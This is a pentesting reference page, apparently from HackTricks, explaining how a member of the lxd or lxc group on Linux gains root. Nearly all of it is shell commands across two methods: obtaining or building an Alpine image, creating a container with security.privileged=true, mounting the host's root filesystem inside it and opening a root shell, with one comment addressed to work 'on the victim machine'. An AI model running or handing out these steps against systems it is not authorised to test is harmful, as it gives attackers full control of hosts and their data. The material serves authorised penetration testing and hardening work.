# lxd/lxc Group - Privilege escalation {{#include ../../../banners/hacktricks-training.md}} If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root ## Exploiting without internet ### Method 1 You can download an alpine image to use with lxd from a trusted repository. Canonical publishes daily builds in their site: [https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/](https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/) Just grab both **lxd.tar.xz** and **rootfs.squashfs** from the newest build. (Directory name is the date). Alternativelly you can install in your machine this distro builder: [https://github.com/lxc/distrobuilder](https://github.com/lxc/distrobuilder) (follow the instructions of the github): ```bash # Install requirements sudo apt update sudo apt install -y golang-go gcc debootstrap rsync gpg squashfs-tools git make build-essential libwin-hivex-perl wimtools genisoimage # Clone repo mkdir -p $HOME/go/src/github.com/lxc/ cd $HOME/go/src/github.com/lxc/ git clone https://github.com/lxc/distrobuilder # Make distrobuilder cd ./distrobuilder make # Prepare the creation of alpine mkdir -p $HOME/ContainerImages/alpine/ cd $HOME/ContainerImages/alpine/ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml # Create the container - Beware of architecture while compiling locally. sudo $HOME/go/bin/distrobuilder build-incus alpine.yaml -o image.release=3.18 -o image.architecture=x86_64 ``` Upload the files **incus.tar.xz** (**lxd.tar.xz** if you downloaded from Canonical repository) and **rootfs.squashfs**, add the image to the repo and create a container: ```bash lxc image import lxd.tar.xz rootfs.squashfs --alias alpine # Check the image is there lxc image list # Create the container lxc init alpine privesc -c security.privileged=true # List containers lxc list lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true ``` > [!CAUTION] > If you find this error _**Error: No storage pool found. Please create a new storage pool**_\ > Run **`lxd init`** and set-up all options on default. Then **repeat** the previous chunk of commands Finally you can execute the container and get root: ```bash lxc start privesc lxc exec privesc /bin/sh [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` ### Method 2 Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. ```bash # build a simple alpine image git clone https://github.com/saghul/lxd-alpine-builder cd lxd-alpine-builder sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine sudo ./build-alpine -a i686 # import the image lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail. # before running the image, start and configure the lxd storage pool as default lxd init # run the image lxc init myimage mycontainer -c security.privileged=true # mount the /root into the image lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true ``` {{#include ../../../banners/hacktricks-training.md}}